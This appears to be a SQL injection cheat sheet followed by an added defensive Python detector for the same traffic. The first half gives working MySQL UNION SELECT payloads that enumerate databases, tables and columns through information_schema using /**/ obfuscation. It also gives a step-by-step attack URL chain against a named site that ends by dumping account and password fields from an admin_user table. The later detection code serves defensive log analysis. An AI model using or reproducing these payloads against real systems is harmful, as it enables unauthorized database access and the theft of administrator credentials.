Enumerating databases
id=-1 union select 1,..,SCHEMA_NAME,n from/**/information_schema.SCHEMATA limit 1,1/*

Enumerating tables

id=-1/**/union/**/select/**/1,TABLE_NAME,N/**/from/**/information_schema.TABLES/**/where/**/TABLE_SCHEMA=<database name in hex>/**/limit/**/1,1

Enumerating columns

id=-1/**/union/**/select/**/1,COLUMN_NAME,N/**/from/**/information_schema.COLUMNS/**/where/**/TABLE_NAME=<table name in hex>/**/limit/**/1,1

MySQL 5 advanced injection method: dumping tables

Example:

1. Dumping tables
http://www.political-security.com/ccaus_content.php?ccausid=13240/**/and/**/1=2/**/union/**/select/**/1,2,3,TABLE_NAME,5/**/From/**/information_schema.TABLES/**/Where/**/TABLE_SCHEMA=0x79645F7465616D6E6574/**/limit/**/0,1/* (0x79645F7465616D6E6574 is the hex encoding of the database name yd_teamnet)
Iterating this way, the admin_user table appeared at the fourth result.

2. Dumping columns
http://www.political-security.com/ccaus_content.php?ccausid=13240/**/and/**/1=2/**/union/**/select/**/1,2,3,COLUMN_NAME,5/**/From/**/information_schema.COLUMNS/**/Where/**/TABLE_NAME=0x61646D696E5F75736572/**/And/**/TABLE_SCHEMA=0x79645F7465616D6E6574/**/limit/**/0,1/*

3. Dumping passwords
http://www.political-security.com/ccaus_content.php?ccausid=13240/**/and/**/1=2/**/union/**/select/**/1,2,3,concat(0x7c,ID,0x7c,ACCOUNT,0x7c,PASSWORD,0x7c),5/**/From/**/admin_user/**/limit/**/0,1/*
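
Added example, not part of the original post: a Python log-triage check for the request pattern shown above. It undoes the /**/ whitespace substitution, flags UNION SELECT requests that read information_schema or carry hex string literals, and decodes those literals so the responder sees which schema or table was being enumerated. The function names and the sample request targets are constructed for illustration.

```python
import re
from urllib.parse import unquote_plus

COMMENT = re.compile(r"/\*.*?\*/", re.S)  # /**/ used in place of spaces
UNION_SELECT = re.compile(r"\bunion\s+(?:all\s+)?select\b")
METADATA = re.compile(r"\binformation_schema\.(schemata|tables|columns)\b")
HEX_LITERAL = re.compile(r"\b0x((?:[0-9a-f]{2})+)\b")  # quote-free string literal


def normalize(query):
    """URL-decode, turn inline comments into spaces, collapse whitespace."""
    text = unquote_plus(query)
    # The second replace handles the unterminated trailing /* seen above.
    text = COMMENT.sub(" ", text).replace("/*", " ")
    return re.sub(r"\s+", " ", text).strip().lower()


def classify(target):
    """Return a finding for a UNION-based enumeration request, else None."""
    _, _, query = target.partition("?")
    text = normalize(query)
    if not UNION_SELECT.search(text):
        return None
    view = METADATA.search(text)
    decoded = [bytes.fromhex(h).decode("latin-1") for h in HEX_LITERAL.findall(text)]
    # "union select" alone also occurs in ordinary search text, so require
    # a metadata view or a hex literal before raising a finding.
    if view is None and not decoded:
        return None
    return {"view": view.group(1) if view else None, "decoded": decoded}


# Constructed sample request targets (hypothetical paths, not real log data).
SAMPLES = [
    "/item.php?id=13240",
    "/search.php?q=credit+union+select+committee",
    "/item.php?id=1/**/and/**/1=2/**/union/**/select/**/1,2,3,TABLE_NAME,5/**/From/**/information_schema.TABLES/**/Where/**/TABLE_SCHEMA=0x79645F7465616D6E6574/**/limit/**/0,1/*",
    "/item.php?id=1%2F%2A%2A%2FUNION%2F%2A%2A%2FSELECT%2F%2A%2A%2F1,COLUMN_NAME,3%2F%2A%2A%2FFROM%2F%2A%2A%2Finformation_schema.COLUMNS%2F%2A%2A%2FWHERE%2F%2A%2A%2FTABLE_NAME=0x61646D696E5F75736572",
]

if __name__ == "__main__":
    for target in SAMPLES:
        print(classify(target), "<-", target[:40])
```

The same normalization step belongs in front of any WAF or SIEM rule for this traffic, since a literal match on "union select" misses both the /**/ and the percent-encoded forms.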